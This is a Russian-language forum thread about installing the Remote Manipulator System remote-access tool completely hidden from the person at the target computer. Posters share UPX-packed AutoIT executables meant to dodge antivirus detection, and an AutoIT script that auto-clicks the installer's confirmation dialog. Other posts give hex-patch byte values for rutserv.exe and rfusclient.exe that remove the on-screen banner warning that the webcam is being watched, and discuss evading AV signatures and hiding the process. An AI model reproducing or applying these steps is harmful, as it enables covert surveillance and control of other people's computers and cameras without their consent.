• Обратная связь: [email protected]

Наш канал в telegram: https://t.me/ru_sfera

Группа VK: https://vk.com/rusfera

Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации

RMS - полностью скрытая установка и управление.

shtraus

Пользователь
Форумчанин
Этот код уже давно на форуме, нужно скачать компилятор АутоИТ и скомпилировать, вот скомпилировал...

RMS_AutoIT.zip - Обработан UPX, что уменьшит детект некоторых АВ;

RMS_AutoIT_No_Puck.zip - Без обработки...

Пароль:111

Спасибо
Посмотрела там только папка .rsrc с фалами

Я так понимаю вот эту папку и файлы заменить на оригинальные котрые находятся в моей в сборке Rms или как по другому?

Запуталась совсем, а вот если добавить код в бат файл в оригинальный, это ерунду сказала?

X-Shar

:)
Администрация
Спасибо
Посмотрела там только папка .rsrc с фалами
Там вроде exe-файл был !Не въехал!!!Не въехал!!!Не въехал!!!

Нужно его запустить перед инсталлом сборки, он закроет окно, похожий скрипт есть и для камеры здесь...

Я-же в своём ролике эти скрипты и использовал, в начале запускается скрипт, потом инсталл сборки, можно сделать запуск в скрипте, т.е. скрипт будет запускать сборку и всё что нужно делать... :)

А вообще а хоть и понимаю что тема уже разрослась в 83-ри страницы, но приходится постоянно повторятся, может стоит прочитать последние страниц 20-30...Не въехал!!!Не въехал!!!Не въехал!!!Не въехал!!!Не въехал!!!

shtraus

Пользователь
Форумчанин
Там вроде exe-файл был !Не въехал!!!Не въехал!!!Не въехал!!!

Нужно его запустить перед инсталлом сборки, он закроет окно, похожий скрипт есть и для камеры здесь...

Я-же в своём ролике эти скрипты и использовал, в начале запускается скрипт, потом инсталл сборки, можно сделать запуск в скрипте, т.е. скрипт будет запускать сборку и всё что нужно делать... :)

А вообще а хоть и понимаю что тема уже разрослась в 83-ри страницы, но приходится постоянно повторятся, может стоит прочитать последние страниц 20-30...Не въехал!!!Не въехал!!!Не въехал!!!Не въехал!!!Не въехал!!!

Не поверите несколь раз прочла этот форум вот некоторые нюансы

А вот можно заплклвать ваш RMS_AutoIT.exe в свою сборку то есть созданый файл Rms.exe
Я создала сборку получился файл Rms.exe значит нужно мой файл Rms.exe открыть в 7-zip и добавиить файл RMS_AutoIT.zip что вы дали?

Или на удаленном компьютере сперва запустить ваш файл RMS_AutoIT.exe а потом сборку Rms.exe ?

shtraus

Пользователь
Форумчанин
Только что попробовала вашь файл, сперва запустила его а потом попробовала установить сборку, установилась тихо то есть диалоговое окна не было но баннер от видео камеры все равно выходит

S

steal

Гость
убираем баннер видеонаблюдения:

[HIDE=30]
открываем rutserv.exe в хексредакторе и задаем поиск строки по байтам OF85CF. первый результат пропускаем, второй тоже и на третьем меняем на E9DOOO. тоже самое делаем с rfusclient.exe
удачи)
P.S. по строчкам защита от нуба
[/HIDE]

Работает на последней 6.3.0.6 и ниже (англ/рус)

Если я помог Вам и вы знаете как переименовать процесс без креша, то отпишите в личку, а)

Последнее редактирование модератором:

X-Shar

Администрация
Только что попробовала вашь файл, сперва запустила его а потом попробовала установить сборку, установилась тихо то есть диалоговое окна не было но баннер от видео камеры все равно выходит
Специально для вас сделал скрипт, убирает все окна...

RMS_AutoIT_Close.exe - Непакованный скрипт;

RMS_AutoIT_Close _UPX.exe - Упакован UPX;

RMS_AutoIT_Close.au3 - Исходник...

Нужно запустить перед запуском установки...

Вложения

• Build.zip
    756.9 КБ · Просмотры: 92
S

steal

Гость
Специально для вас сделал скрипт, убирает все окна...

RMS_AutoIT_Close.exe - Непакованный скрипт;

RMS_AutoIT_Close _UPX.exe - Упакован UPX;

RMS_AutoIT_Close.au3 - Исходник...

Нужно запустить перед запуском установки...

В аутоит можно сделать проще в три строчки ) В связи с убогими, которые сливают на VT не разглашаю xD

Последнее редактирование модератором:

dencikkkk

Пользователь
Форумчанин
Здрасти
Вот например я создала сборку из Rms 6 та которая с официального сайта, как сделать что бы диалоговое окно то что в конце инсталляции где где две кнопки да или нет вот чтобы это окно не появлялось и баннер видео убрать
Вот молодоц человек Nodarius послал мне код а куда его поставить и в какой файл не успел
Вото этот код

#NoTrayIcon
#include "Process.au3"
While 1
$hRMS = WinGetHandle("Remote Manipulator System - Вопрос")
If $hRMS<>"" Then
ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]")
Exit
EndIf
WEnd
качай autoIT (гугл в помощь)

X-Shar

Администрация
Если я помог Вам и вы знаете как переименовать процесс без креша, то отпишите в личку, а)
https://ru-sfera.pw/threads/rms-polnostju-skrytaja-ustanovka-i-upravlenie.1891/page-79#post-135386
В аутоит можно сделать проще в три строчки ) В связи с убогими, которые сливают на VT не разглашаю xD
А чем мой скрипт неустраивает ?

Там есть исходник, кому нужно тот поменяет, а три строчки навряд-ли войдёт, это если разово только закрывать без цикла, что не есть гуд...

Детект-же идёт на API, лечится очень легко кстати !смех-смех!!!

X-Shar

Администрация
а то что это ребёнок разводит тут народ, это нормально? банить нужно "оно"
Кого банить а кого нет мы и сами разберёмся, а вот вы уже забанины, неодного поста по существу...:Mem26:

Верх Низ